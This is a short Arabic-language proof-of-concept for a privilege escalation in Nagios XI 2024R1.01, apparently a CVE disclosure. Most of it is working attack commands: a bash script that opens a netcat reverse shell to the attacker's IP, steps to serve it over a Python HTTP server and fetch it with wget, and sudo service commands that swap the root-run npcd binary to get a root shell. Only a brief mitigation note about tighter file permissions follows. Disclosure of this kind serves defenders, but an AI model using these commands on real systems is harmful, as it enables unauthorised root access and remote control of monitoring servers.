
تصعيد الامتيازات في Nagios 2024R1.01
تم اكتشاف CVE بواسطة: Jarod Jaslow (MAWK)
كمستخدم "NAGIOS"، قم بإنشاء ملف على جهاز المهاجم بالمحتوى التالي:
#!/bin/bash
nc -e /bin/bash <عنوان IP للمهاجم> 4445

قم باستضافة الملف على جهاز المهاجم عبر خادم HTTP بلغة Python:
python3 -m http.server 8000

ابدأ خادم استماع Netcat (NC) على جهاز المهاجم:
nc -nlvp 4445

قم بجلب الملف من جهاز المهاجم:
wget http://<عنوان IP للمهاجم>:8000/npcd

قم بتنفيذ الأوامر التالية لتصعيد الصلاحيات واستقبال اتصال كمستخدم root:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


يوصى بتقييد قدرة المستخدم "NAGIOS" على الكتابة إلى ملفات تنفيذ خدمات Nagios التي تعمل كمستخدم root. يمكن تحقيق ذلك من خلال تطبيق أذونات ملفات أكثر صرامة وضوابط وصول للدلائل والملفات ذات الصلة بخدمات Nagios.
ينبغي إصلاح هذه المشكلة في الإصدارات الجديدة
CVE: